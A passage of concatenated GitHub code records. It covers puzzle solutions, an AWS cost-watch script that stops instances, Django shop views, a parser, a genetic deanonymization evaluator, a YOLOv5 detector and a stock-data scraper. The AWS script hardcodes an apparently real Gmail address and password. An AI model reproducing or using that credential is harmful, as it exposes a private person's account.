is:\n[A-C] [X-Z]\n\"\"\"\n\nSCORES = {\n \"X\": {\n \"A\": 4,\n \"B\": 1,\n \"C\": 7\n },\n \"Y\": {\n \"A\": 8,\n \"B\": 5,\n \"C\": 2\n },\n \"Z\": {\n \"A\": 3,\n \"B\": 9,\n \"C\": 6\n },\n}\n\n\ndef main():\n with open('input.txt') as f:\n total_score = 0\n for line in f:\n their_move, your_move = line.strip().split()\n print(their_move, your_move, SCORES[your_move][their_move])\n total_score += SCORES[your_move][their_move]\n\n return total_score\n\n\nif __name__ == \"__main__\":\n print(main())\n","repo_name":"meyerkev/advent_of_code_2022","sub_path":"dec2/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13365911483","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 20 13:50:10 2019\n\n@author: aritra.chatterjee\n\"\"\"\nimport boto3\nimport json\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime,timedelta\n\nwith open('rootkey.csv') as key_file:\n keyfile = key_file.readlines()\n \nclient = boto3.client(\n 'ce',\n aws_access_key_id=keyfile[0].split('=')[1][:-1],\n\n aws_secret_access_key=keyfile[1].split('=')[1])\n\n\"\"\"Computation of starting day of the month from current date\"\"\"\n\ncurrent_year_month = datetime.now().strftime('%Y-%m')\nfirst_day = '01'\nstart_bill_date = current_year_month+'-'+first_day\n\nresponse = client.get_cost_and_usage(\n TimePeriod={\n 'Start':start_bill_date,\n 'End': datetime.now().strftime('%Y-%m-%d')\n },\n Granularity = 'MONTHLY',\n Metrics= ['USAGE_QUANTITY','AMORTIZED_COST'],\n GroupBy=[{\n 'Type': 'DIMENSION',\n 'Key': 'INSTANCE_TYPE'}\n ]\n )\n\n# =============================================================================\n# with open(\"cost.json\",\"w\") as cost:\n# json.dump(response,cost)\n# \n# =============================================================================\nresults=response['ResultsByTime']\nresults=results[0]\nusage=results['Groups']\nkeys=[usage[i]['Keys'] for i in range(len(usage))]\ncost = usage[0]['Metrics']['AmortizedCost']['Amount']\nhours=[usage[i]['Metrics']['UsageQuantity']['Amount']for i in range(len(usage))]\nhours_consumption=[round((float(usage[i]['Metrics']['UsageQuantity']['Amount'])/750)*100,2) for i in range(len(usage))]\nCost = float(cost)\ntotal_cost=round( Cost*70.716463,2)\nusage_df=pd.DataFrame(np.column_stack([keys,hours,hours_consumption]),columns=['Instance Type','Hours Consumed(750)','Hours Consumption(%)'])\n\n\n\"\"\"Switch of the ec2 instance\"\"\"\ndata=usage_df[usage_df['Instance Type']=='t2.micro']\nhours=(data['Hours Consumption(%)'].values)\nhours = int(float(hours[0]))\n\nif hours > 95:\n \n instance_id='i-0e803b92bf78d32ee'\n \n ec2=boto3.client('ec2','ap-south-1',\n aws_access_key_id=keyfile[0].split('=')[1][:-1],\n aws_secret_access_key=keyfile[1].split('=')[1])\n \n ec2.describe_regions()\n ec2 = boto3.resource('ec2',\n 'ap-south-1',\n aws_access_key_id=keyfile[0].split('=')[1][:-1],\n aws_secret_access_key=keyfile[1].split('=')[1])\n instance = ec2.Instance(instance_id)\n \n instance.stop(True)\n with open('cost_log.txt', 'a+') as log_note:\n log_note.write(\"{}: ec2 instance stopped. \\r\\n\".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))\n\nelse: \n with open('cost_log.txt', 'a+') as log_note:\n log_note.write(\"{}: ec2 instance total hour consumption is {} \\r\\n\".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),hours_consumption[2]))\n\n \n\n\"\"\"Switch of the RDS Database\"\"\"\nrds=usage_df[usage_df['Instance Type']=='db.t2.micro']\nhours=(rds['Hours Consumption(%)'].values)\nhours = int(float(hours[0]))\n\nif hours > 95:\n client = boto3.client('rds','us-east-1',\n aws_access_key_id=keyfile[0].split('=')[1][:-1],\n aws_secret_access_key=keyfile[1].split('=')[1])\n client.stop_db_instance(DBInstanceIdentifier='richie-database')\n with open('cost_log.txt', 'a+') as log_note:\n log_note.write(\"{}: db2 database instance stopped. \\r\\n\".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))\n\n\nelse: \n with open('cost_log.txt', 'a+') as log_note:\n log_note.write(\"{}: db2 instance total hour consumption is {} \\r\\n\".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),hours_consumption[1]))\n\nwith open('cost_log.txt', 'a+') as log_note:\n log_note.write(\"{}: The total cost for AWS till this moment is {} \\r\\n\".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),total_cost))\n\nimport yagmail\npassword='Anahata@123' ### Password is changed now and cryptography is used on the user credentials.\nyagmail.register(\"richie.chatterjee31@gmail.com\", password)\nyag = yagmail.SMTP(\"richie.chatterjee31@gmail.com\", password)\nhtml_msg = [\"{}: The total cost as of now is Rs {} \\r\\n\".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),total_cost),\n r\"C:\\Users\\aritra.chatterjee\\Desktop\\AWS_API_Key\\cost_log.txt\"]\nyag.send('richie.chatterjee31@gmail.com', \"AWS Bill Till This Moment!\", html_msg)\n\n\n","repo_name":"richie312/AWS_Instance_Operation_Automation","sub_path":"cost.py","file_name":"cost.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2529421266","text":"# Day 7: Internet Protocol Version 7\n\ndef is_ABBA(s):\n for i in range(len(s)-3):\n if s[i] == s[i+3] and s[i+1] == s[i+2] and s[i] != s[i+1]:\n return True\n return False\n\ndef split_sequences(IP):\n\n super = True\n super_seqs = []\n hyper_seqs = []\n seq = []\n for c in IP:\n if c == \"[\":\n super = False\n if len(seq) > 0:\n super_seqs.append(\"\".join(seq))\n seq = []\n elif c == \"]\":\n super = True\n if len(seq) > 0:\n hyper_seqs.append(\"\".join(seq))\n seq = []\n else:\n seq.append(c)\n if len(seq) > 0:\n super_seqs.append(\"\".join(seq))\n\n return super_seqs, hyper_seqs\n\ndef supports_TLS(IP):\n\n super_seqs, hyper_seqs = split_sequences(IP)\n\n # Check supernet sequences\n is_abba_super = False\n for seq in super_seqs:\n if is_ABBA(seq):\n is_abba_super = True\n break\n if not is_abba_super:\n return False\n\n # Check hypernet sequences\n is_abba_hyp = False\n for seq in hyper_seqs:\n if is_ABBA(seq):\n is_abba_hyp = True\n break\n\n if is_abba_super and not is_abba_hyp:\n return True\n else:\n return False\n\ndef supports_SSL(IP):\n\n super_seqs, hyper_seqs = split_sequences(IP)\n\n # Find ABA blocks in supernet sequences\n ABA_blocks = []\n for s in super_seqs:\n for i in range(len(s)-2):\n if s[i] == s[i+2] and s[i] != s[i+1]:\n ABA_blocks.append(s[i:i+3])\n\n # Check if any ABA block has a corresponding\n # BAB block in hypernet sequences\n for aba in ABA_blocks:\n bab = aba[1] + aba[0] + aba[1]\n for s in hyper_seqs:\n for i in range(len(s)-2):\n if s[i:i+3] == bab:\n return True\n\n return False\n\n# ---------------------------------------\n\nIPs = []\nwith open(\"day7.in\") as f:\n for line in f:\n IPs.append(line.strip())\n\ndo_support = 0\nfor IP in IPs:\n if supports_TLS(IP):\n do_support += 1\n\nprint(\"Part 1:\", do_support)\n\ndo_support = 0\nfor IP in IPs:\n if supports_SSL(IP):\n do_support += 1\nprint(\"Part 2:\", do_support)\n","repo_name":"meithan/AoC16","sub_path":"day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22658882415","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def maxProduct(self, root: Optional[TreeNode]) -> int:\n self.ans=0\n def gettotal(root):\n if not root:\n return 0\n \n left=gettotal(root.left)\n right=gettotal(root.right)\n return (root.val+left+right)\n \n \n def getans(root, totalsum,ans):\n if not root:\n return 0\n \n subtree=0\n subtree+=getans(root.left, totalsum, self.ans)\n subtree+=getans(root.right, totalsum, self.ans)\n subtree+=root.val\n if subtree*(totalsum-subtree)>self.ans:\n self.ans=subtree*(totalsum-subtree)\n \n return subtree\n \n \n totalsum = gettotal(root)\n \n getans(root, totalsum, self.ans)\n return self.ans%1000000007\n \n \n ","repo_name":"harssh1029/Leetcode","sub_path":"1339-maximum-product-of-splitted-binary-tree/1339-maximum-product-of-splitted-binary-tree.py","file_name":"1339-maximum-product-of-splitted-binary-tree.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8944390857","text":"from django.core.paginator import Paginator\nfrom django.db.models import Q\nfrom django.shortcuts import render, get_object_or_404\nfrom django.utils.text import slugify\nfrom django.views.decorators.cache import cache_control\n\nfrom .models import Category, Brand,Product,ProductVariant,ProductImage,Banner,Color\nfrom Cartapp.models import WishListItem\nfrom decimal import Decimal\nimport math\nfrom decimal import Decimal, ROUND_HALF_UP\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef home(request):\n categories = Category.objects.filter(is_active=True)\n brands = Brand.objects.filter(is_active=True)\n all_banners = Banner.objects.all()\n return render(request, 'home.html', {'categories': categories, 'brands': brands,'all_banners':all_banners})\n\n\n\n\ndef shop(request):\n category_id = request.GET.get('category', 'all')\n brand_id = request.GET.get('brand', 'all')\n\n brands = Brand.objects.filter(is_active=True)\n categories = Category.objects.filter(is_active=True).order_by('name')\n products = Product.objects.filter(category__is_active=True, is_active=True)\n all_variants = ProductVariant.objects.filter(is_active=True, product__in=products)\n distinct_colors = Color.objects.filter(productvariant__in=all_variants).distinct()\n current_category = 'All Products'\n\n # Price Range Filter Logic\n price_range_filters = {\n '0-2000': (0, 2000),\n '2000-5000': (2000, 5000),\n '5000-15000': (5000, 15000),\n '15000-30000': (15000, 30000),\n '30000': (30000, None),\n }\n\n selected_price_range = request.GET.get('price_range', None)\n\n if request.method == 'POST':\n selected_brands = request.POST.getlist('brands[]', [])\n if 'all' in selected_brands:\n selected_brands.remove('all')\n if not selected_brands:\n products = Product.objects.filter(is_active=True)\n else:\n products = Product.objects.filter(category__is_active=True, is_active=True,\n brandName__pk__in=selected_brands)\n\n selected_variants = all_variants.filter(product__in=products)\n else:\n if category_id == 'all':\n current_category = 'All Products'\n products = Product.objects.filter(is_active=True).order_by('name')\n elif category_id:\n current_category = Category.objects.get(id=category_id, is_active=True)\n products = Product.objects.filter(category=current_category, is_active=True)\n else:\n products = Product.objects.filter(category__is_active=True, is_active=True)\n current_category = 'All Products'\n\n selected_variants = all_variants.filter(product__in=products)\n\n # Brand Filtering Logic\n if brand_id == 'all':\n selected_brands = []\n else:\n selected_brands = [brand_id]\n\n if selected_brands:\n selected_variants = selected_variants.filter(product__brandName__pk__in=selected_brands)\n\n selected_colors = request.GET.getlist('colors[]', [])\n if selected_colors:\n selected_variants = selected_variants.filter(color__pk__in=selected_colors)\n search_query = request.GET.get('search', None)\n if search_query:\n selected_variants = selected_variants.filter(\n Q(product__name__icontains=search_query) |\n Q(product__brandName__name__icontains=search_query) |\n Q(color__color__icontains=search_query)\n )\n if selected_price_range:\n min_price, max_price = price_range_filters.get(selected_price_range, (0, None))\n if max_price is None:\n selected_variants = selected_variants.filter(price__lt=min_price)\n else:\n selected_variants = selected_variants.filter(price__gte=min_price, price__lte=max_price)\n\n if current_category != 'All Products':\n title = current_category\n elif search_query:\n title = f\"Search Results for '{search_query}'\"\n else:\n title = \"All Products\"\n\n active_offers = {}\n for brand in brands:\n if brand.offer_is_active:\n active_offers[brand.pk] = Decimal(brand.offer_percentage)\n\n for variant in selected_variants:\n brand_pk = variant.product.brandName.pk\n if brand_pk in active_offers:\n offer_percentage = active_offers[brand_pk]\n offer_price = variant.price - (variant.price * (offer_percentage / 100))\n offer_price = offer_price.to_integral_value(rounding=ROUND_HALF_UP)\n variant.offer_price = '{:.2f}'.format(offer_price)\n else:\n variant.offer_price = None\n\n paginator = Paginator(selected_variants, 9)\n page_number = request.GET.get('page')\n page_variants = paginator.get_page(page_number)\n\n context = {\n 'products': products,\n 'categories': categories,\n 'current_category': current_category,\n 'brands': brands,\n 'page_variants': page_variants,\n 'distinct_colors': distinct_colors,\n 'category_id': category_id,\n 'brand_id': brand_id,\n 'selected_colors': selected_colors,\n 'title': title,\n 'active_offers': active_offers,\n 'selected_brands': selected_brands,\n 'selected_price_range': selected_price_range,\n }\n return render(request, 'shop.html', context)\ndef product_detail(request, slug):\n product = get_object_or_404(Product, slug=slug, is_active=True)\n selected_variant = product.productvariant_set.first() # Assuming you want to display the first color variant initially\n images = selected_variant.images.all() # Retrieve the images associated with the selected variant\n\n if request.method == 'POST':\n selected_variant_id = request.POST.get('variant_id')\n try:\n selected_variant = product.productvariant_set.get(id=selected_variant_id)\n images = selected_variant.images.all() # Retrieve the images associated with the newly selected variant\n except ProductVariant.DoesNotExist:\n # Handle the case where the selected variant doesn't exist for the product\n pass\n\n variants = product.productvariant_set.all() # Retrieve all variants for the product\n\n context = {\n 'product': product,\n 'selected_variant': selected_variant,\n 'images': images,\n 'variants': variants,\n 'is_in_wishlist': WishListItem.objects.filter(wishlist__user=request.user,\n product=selected_variant).exists() if request.user.is_authenticated else False,\n }\n brand = selected_variant.product.brandName\n if brand.offer_is_active:\n offer_percentage = Decimal(brand.offer_percentage)\n offer_price = selected_variant.price * (1 - offer_percentage / 100)\n offer_price=offer_price.to_integral_value(rounding=ROUND_HALF_UP)\n offer_price= '{:.2f}'.format(offer_price)\n context['offer_price'] = offer_price\n return render(request, 'product_detail.html', context)\n","repo_name":"ManavBVijayan/TimesBuy","sub_path":"TimesBuyProject/Store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7005,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70194566828","text":"n = int(input())\nmatrix = [list(input().rstrip()) for _ in range(n)]\n\ndx = [1, 0, 0, -1]\ndy = [0, 1, -1, 0]\nans = []\n\nfor _ in range(2):\n\n que = []\n visited = [[False for _ in range(n)] for _ in range(n)]\n cnt = 0\n\n for i in range(n):\n for j in range(n):\n if not visited[i][j]:\n que.append([i, j])\n while que:\n x, y = que.pop()\n visited[x][y] = True\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if 0 <= nx < n and 0 <= ny < n:\n if matrix[i][j] == matrix[nx][ny] and not visited[nx][ny]:\n que.append([nx, ny])\n cnt += 1\n \n ans.append(cnt)\n\n for i in range(n):\n for j in range(n):\n if matrix[i][j] == \"G\":\n matrix[i][j] = \"R\"\n\nprint(ans[0], ans[1])","repo_name":"Eilhwan/algorithms","sub_path":"newOnes/implementations/RedGreen.py","file_name":"RedGreen.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6419382008","text":"# -*- encoding: UTF-8 -*-\n\n'''\n===============================================================================\nSitegen\n\nAuthor: Karlisson M. Bezerra\nE-mail: contact@hacktoon.com\nURL: https://github.com/hacktoon/sitegen\nLicense: WTFPL - http://sam.zoy.org/wtfpl/COPYING\n===============================================================================\n'''\n\nfrom .exceptions import PageValueError\n\nNEWLINE = '\\n'\n\nTOK_NAME = 'name'\nTOK_TEXT = 'content'\nTOK_ESCAPE = '\\\\'\nTOK_EOF = '\\0'\nTOK_ASSIGN = '='\nTOK_COMMA = ','\nTOK_OPENLIST = '['\nTOK_CLOSELIST = ']'\nTOK_OPENGROUP = '{'\nTOK_CLOSEGROUP = '}'\n\nKEYCHARS = ''.join([\n NEWLINE,\n TOK_ASSIGN,\n TOK_COMMA,\n TOK_OPENLIST,\n TOK_CLOSELIST,\n TOK_OPENGROUP,\n TOK_CLOSEGROUP\n])\n\ndef _create_env(text):\n data = {}\n return {\n 'index': 0,\n 'text': text,\n 'tokens': [],\n 'current_token': None,\n 'data': data,\n 'stack': [data]\n }\n\ndef _create_token(type, value, line=1, column=0):\n return {\n 'type': type,\n 'value': value,\n 'line': line,\n 'column': column\n }\n\ndef _tokenize(text):\n line = 1\n column = 0\n cache = []\n tokens = []\n inlist = False\n text = text.strip()\n escape = False\n for index, char in enumerate(text):\n if char == TOK_ESCAPE:\n escape = True\n continue\n if char in KEYCHARS and escape:\n cache.append(char)\n column += 1\n escape = False\n continue\n if char not in KEYCHARS or not inlist and char == TOK_COMMA:\n cache.append(char)\n column += 1\n continue\n name = ''.join(cache).strip()\n inlist = {\n TOK_OPENLIST: True,\n TOK_CLOSELIST: False\n }.get(char, inlist)\n if name == TOK_TEXT:\n token = _create_token(TOK_TEXT, text[index:].strip(), line, column)\n tokens.append(token)\n return tokens\n if name:\n tokens.append(_create_token(TOK_NAME, name, line, column))\n if char == NEWLINE:\n line += 1\n column = 0\n else:\n column += 1\n tokens.append(_create_token(char, char, line, column))\n cache = []\n\n # remaining chars\n name = ''.join(cache).strip()\n if name:\n tokens.append(_create_token(TOK_NAME, name, line, column))\n return tokens\n\ndef _error(env, msg):\n token = env['current_token']\n raise PageValueError('{} at line {}, column {}'.format(\n msg, token['line'], token['column']))\n\ndef _next_token(env):\n env['index'] += 1\n try:\n next = env['tokens'][env['index']]\n except IndexError:\n next = _create_token(TOK_EOF, TOK_EOF)\n env['current_token'] = next\n return next\n\ndef _consume(env, expected):\n token = env['current_token']\n if token['type'] == TOK_EOF:\n return\n if token['type'] != expected:\n _error(env, 'Expected a {!r}'.format(expected))\n _next_token(env)\n\ndef _parse_group(env):\n rules = {}\n env['stack'].append(rules)\n while env['current_token']['type'] not in (TOK_CLOSEGROUP, TOK_EOF):\n _parse_rule(env)\n _consume(env, TOK_CLOSEGROUP)\n env['stack'].pop()\n return rules\n\ndef _parse_list(env):\n names = []\n while True:\n token = env['current_token']\n if token['type'] == TOK_CLOSELIST:\n _next_token(env)\n break\n if token['type'] == TOK_NAME:\n names.append(token['value'])\n _next_token(env)\n else:\n _error(env, 'Expected a name, got {!r}'.format(token['value']))\n token = env['current_token']\n if token['type'] == TOK_COMMA:\n token = _next_token(env)\n continue\n elif token['type'] == TOK_CLOSELIST:\n _next_token(env)\n break\n else:\n _error(env, 'Invalid syntax')\n return names\n\ndef _parse_value(env):\n token = env['current_token']\n if token['type'] == TOK_NAME:\n value = token['value']\n _next_token(env)\n elif token['type'] == TOK_OPENLIST:\n _next_token(env)\n value = _parse_list(env)\n elif token['type'] == TOK_OPENGROUP:\n _next_token(env)\n value = _parse_group(env)\n else:\n _error(env, 'Invalid value format')\n return value\n\ndef _parse_rule(env):\n token = env['current_token']\n if token['type'] not in (TOK_NAME, TOK_TEXT):\n _error(env, 'Expected a name, got {!r}'.format(token['value']))\n name = token['value']\n if token['type'] == TOK_TEXT:\n if len(env['stack']) > 1:\n _error(env, 'Wrong syntax')\n env['data'][TOK_TEXT] = token['value']\n _next_token(env)\n return\n token = _next_token(env)\n if token['type'] == TOK_ASSIGN:\n _next_token(env)\n value = _parse_value(env)\n env['stack'][-1][name] = value\n elif token['type'] == TOK_EOF:\n _next_token(env)\n return\n else:\n _error(env, 'Invalid syntax')\n\ndef _parse_ruleset(env):\n while env['current_token']['type'] not in (TOK_EOF, TOK_CLOSEGROUP):\n _parse_rule(env)\n return env['data']\n\ndef parse(text):\n if not len(text.strip()):\n return {}\n env = _create_env(text)\n tokens = _tokenize(text)\n env['tokens'] = tokens\n env['current_token'] = tokens[0]\n return _parse_ruleset(env)\n","repo_name":"hacktoon/sitegen","sub_path":"sitegen/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":5392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16337670089","text":"#!/usr/bin/env python3\n\nfrom collections import Counter, defaultdict\nfrom datetime import datetime\nfrom random import shuffle, getstate, setstate, seed\nfrom pickle import load\nfrom argparse import ArgumentParser\nfrom math import sqrt\nfrom sys import stdout\n\nimport pdb\n\nfrom bayes_deanonymize import BayesDeanonymize\nfrom population import PopulationUnpickler\nfrom data_logging import (write_log, change_logfile_name,\n stop_logging, start_logging)\n\nparser = ArgumentParser(description = \"Evaluate performance of classification.\")\nparser.add_argument(\"population\")\nparser.add_argument(\"classifier\")\nparser.add_argument(\"--data-logfile\",\n help = \"Filename to write log data to.\")\nparser.add_argument(\"--num_node\", \"-n\", type = int, default = 10)\nparser.add_argument(\"--test_node\", \"-t\", type = int, action = \"append\")\nparser.add_argument(\"--subset_labeled\", \"-s\", type = int, default = None,\n help = \"Chose a random subset of s nodes from the set of labeled nodes.\")\nparser.add_argument(\"--ibd-threshold\", type = int, default = 5000000,\n help = \"IBD segments smaller than this value will \"\n \"go undetected\")\nparser.add_argument(\"--deterministic_random\", \"-d\", action = \"store_true\",\n help = \"Seed the random number generator such that the same labeled nodes will be chosen on runs with the same number of nodes.\")\nparser.add_argument(\"--deterministic_labeled\", \"-ds\", action = \"store_true\",\n help = \"Seed the random number generator to ensure labeled node subset is deterministic.\")\nargs = parser.parse_args()\n\nif args.data_logfile:\n change_logfile_name(args.data_logfile)\n start_logging()\nelse:\n stop_logging()\n\nwrite_log(\"args\", args)\n\nprint(\"Loading population.\", flush = True)\nwith open(args.population, \"rb\") as pickle_file:\n population = PopulationUnpickler(pickle_file).load()\n\nprint(\"Loading classifier\", flush = True)\nwith open(args.classifier, \"rb\") as pickle_file:\n classifier = load(pickle_file)\n\nnodes = set(member for member in population.members\n if member.genome is not None)\n# nodes = set(member for member in population.generations[-1].members\n# if member.genome is not None)\n\nif args.subset_labeled:\n # we want the labeled nodes to be chosen randomly, but the same\n # random nodes chosen every time if the same number of labeled\n # nodes is chosen.\n sorted_labeled = list(classifier._labeled_nodes)\n sorted_labeled.sort()\n if args.deterministic_random or args.deterministic_labeled:\n rand_state = getstate()\n seed(42)\n shuffle(sorted_labeled)\n setstate(rand_state)\n else:\n shuffle(sorted_labeled)\n classifier._labeled_nodes = sorted_labeled[:args.subset_labeled]\n\nwrite_log(\"labeled nodes\", classifier._labeled_nodes)\n\nbayes = BayesDeanonymize(population, classifier)\n\nid_mapping = population.id_mapping\nlabeled_nodes = set(id_mapping[node_id] for node_id\n in classifier._labeled_nodes)\nif args.test_node is not None and len(args.test_node) > 0:\n unlabeled = [id_mapping[node_id] for node_id in args.test_node]\nelse:\n all_unlabeled = list(nodes - labeled_nodes)\n all_unlabeled.sort(key = lambda node: node._id)\n if args.deterministic_random:\n rand_state = getstate()\n seed(43)\n shuffle(all_unlabeled)\n setstate(rand_state)\n else:\n shuffle(all_unlabeled)\n unlabeled = all_unlabeled[:args.num_node]\n\nwrite_log(\"to identify\", [node._id for node in unlabeled])\n\ncorrect = 0\nincorrect = 0\n# Maps generation -> counter with keys \"correct\" and \"incorrect\"\ngeneration_error = defaultdict(Counter)\nno_common_ancestor = 0\ngeneration_map = population.node_to_generation\nskipped = 0\n# write_log(\"labeled_nodes\", [node._id for node in labeled_nodes])\n# write_log(\"target_nodes\", [node._id for node in unlabeled])\nprint(\"Attempting to identify {} random nodes.\".format(len(unlabeled)),\n flush = True)\nwrite_log(\"start time\", datetime.now())\nfor i, node in enumerate(unlabeled):\n print(\"Iteration: {}, actual node ID: {}\".format(i + 1, node._id))\n identified, ln_ratio = bayes.identify(node.genome, node, args.ibd_threshold)\n # if ln_ratio < 0.1:\n # skipped += 1\n # continue\n assert len(identified) > 0\n # pdb.set_trace()\n node_generation = generation_map[node]\n if node in identified:\n generation_error[node_generation][\"correct\"] += 1\n correct += 1\n print(\"correct\")\n else:\n generation_error[node_generation][\"incorrect\"] += 1\n print(\"incorrect\")\n incorrect += 1\n write_log(\"evaluate\", {\"target node\": node._id, \"log ratio\": ln_ratio,\n \"identified\": set(x._id for x in identified)})\n stdout.flush()\n\nwrite_log(\"end time\", datetime.now())\nprint(\"{} skipped\".format(skipped))\nprint(\"{} correct, {} incorrect, {} total.\".format(correct, incorrect,\n len(unlabeled)))\nstdout.flush()\n\nwrite_log(\"correct\", correct)\nwrite_log(\"incorrect\", incorrect)\nwrite_log(\"total\", len(unlabeled))\ntotal = correct + incorrect\npercent_accurate = correct / total\nstd_dev = sqrt(percent_accurate * (1 - percent_accurate) * total) / total\nprint(\"{}±{:0.3} percent accurate.\".format(percent_accurate, std_dev))\nfor generation, counter in generation_error.items():\n gen_correct = counter[\"correct\"]\n gen_incorrect = counter[\"incorrect\"]\n total = gen_correct + gen_incorrect\n format_string = \"For generation {}: {} accuracy, {} total.\"\n print(format_string.format(generation, gen_correct / total, total))\n","repo_name":"AlexxNica/genetic_privacy","sub_path":"predict/evaluate_deanonymize.py","file_name":"evaluate_deanonymize.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"31158972905","text":"from pathlib import Path\n\nimport cv2\nimport numpy as np\nimport torch\n\nfrom models.common import DetectMultiBackend\nfrom utils.augmentations import letterbox\nfrom utils.general import LOGGER, non_max_suppression, scale_coords\nfrom utils.plots import Annotator, colors\n\n\ndef initialize_model(weights, device):\n model = DetectMultiBackend(weights, device=device, dnn=False)\n return model\n\ndef initialize_reader(source):\n if source == '0':\n source = int(source)\n cap = cv2.VideoCapture(source)\n else:\n cap = cv2.VideoCapture(source)\n return cap\n\n\ndef initialize_writer():\n pass\n\n\ndef get_frame(reader):\n for i in range(10):\n reader.read()\n ret, img = reader.read()\n return ret, img\n\ndef prepare_frame(frame, imgsz, device):\n im0s = [frame.copy()]\n \n im = [letterbox(x, imgsz, stride=32, auto=True)[0] for x in im0s]\n\n # Stack\n im = np.stack(im, 0)\n\n # Convert\n im = im[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW\n im = np.ascontiguousarray(im)\n im = torch.from_numpy(im).to(device)\n im = im.float() # uint8 to fp16/32\n im /= 255 # 0 - 255 to 0.0 - 1.0\n if len(im.shape) == 3:\n im = im[None] # expand for batch dim\n return im\n\ndef definition_of_predictions(model, im, imgsz):\n model.warmup(imgsz=(1, 3, imgsz), half=False) # warmup\n # Inference\n pred = model(im, augment=False, visualize=False)\n\n # NMS\n pred = non_max_suppression(pred, conf_thres=0.25, iou_thres=0.45, classes=None, max_det=100)\n print(pred)\n return pred\n\n\ndef show_result(model, view_img, source, im, frame, pred):\n names = model.names\n path = source\n im = im\n im0s = [frame.copy()]\n s = ''\n\n # Process predictions\n for i, det in enumerate(pred): # per image\n if source == '0': # batch_size >= 1\n p, im0 = path[i], im0s[i].copy()\n s += f'{i}: '\n else:\n p, im0 = path, im0s.copy()\n\n p = Path(p) # to Path\n s += '%gx%g ' % im.shape[2:] # print string\n annotator = Annotator(im0, line_width=3, example=str(names))\n if len(det):\n # Rescale boxes from img_size to im0 size\n det[:, :4] = scale_coords(im.shape[2:], det[:, :4], im0.shape).round()\n\n # Print results\n for c in det[:, -1].unique():\n n = (det[:, -1] == c).sum() # detections per class\n s += f\"{n} {names[int(c)]}{'s' * (n > 1)}, \" # add to string\n\n # Write results\n for *xyxy, conf, cls in reversed(det):\n if view_img: # Add bbox to image\n c = int(cls) # integer class\n label = (f'{names[c]} {conf:.2f}')\n annotator.box_label(xyxy, label, color=colors(c, True))\n # Print time (inference-only)\n LOGGER.info(f'{s}Done.')\n\n # Stream results\n im0 = annotator.result()\n if view_img:\n cv2.imshow(str(p), im0)\n cv2.waitKey(1) # 1 millisecond\n\n\ndef main(source, device, weights, view_img, imgsz):\n model = initialize_model(weights, device)\n reader = initialize_reader(source)\n # writer = initialize_writer(...params...) // Этот не очень нужен, но можно оставить.\n\n while True:\n ret, frame = get_frame(reader)\n if not ret:\n break\n im = prepare_frame(frame, imgsz, device)\n pred = definition_of_predictions(model, im, imgsz)\n show_result(model, view_img, source, im, frame, pred)\n\nif __name__ == \"__main__\":\n source='0'\n device='cpu'\n weights='yolov5s.pt'\n view_img=True\n imgsz=640 \n main(source, device, weights, view_img, imgsz)","repo_name":"stekloplastik/Yolov5Test","sub_path":"my_detect3.py","file_name":"my_detect3.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43183972377","text":"from io import StringIO\nimport requests\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport bs4\nimport csv\nimport os\n\nsession = requests.session()\n\nheaders = {\n \"user-agent\": \"Chrome/87.0.4280.88\"\n}\nhead = {\n 'user-agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/87.0.4280.88 Safari/537.36 \"\n}\n\ndef getDataSpecifyDate(company, from_date=(datetime.today().strftime(\"%d-%m-%Y\")), to=(datetime(datetime.today().year - 1, datetime.today().month,datetime.today().day).strftime(\"%d-%m-%Y\"))):\n session.get(\"https://www.nseindia.com\", headers=head)\n session.get(\"https://www.nseindia.com/get-quotes/equity?symbol=\" + company, headers=head)\n session.get(\"https://www.nseindia.com/api/historical/cm/equity?symbol=\" + company, headers=head)\n url = \"https://www.nseindia.com/api/historical/cm/equity?symbol=\" + company + \"&series=[%22EQ%22]&from=\" + from_date + \"&to=\" + to + \"&csv=true\"\n data = session.get(url=url, headers=head)\n df = pd.read_csv(StringIO(data.text[3:]))\n return df\n\n\n\ndef getDataOfOneYear(varient, from_date = ((datetime(datetime.today().year - 1, datetime.today().month, datetime.today().day) + timedelta(days=2)).strftime(\"%d-%m-%Y\")), to_date =(datetime.today().strftime(\"%d-%m-%Y\"))):\n varient = varient.upper()\n varient = varient.replace(' ', '%20')\n varient = varient.replace('-', '%20')\n 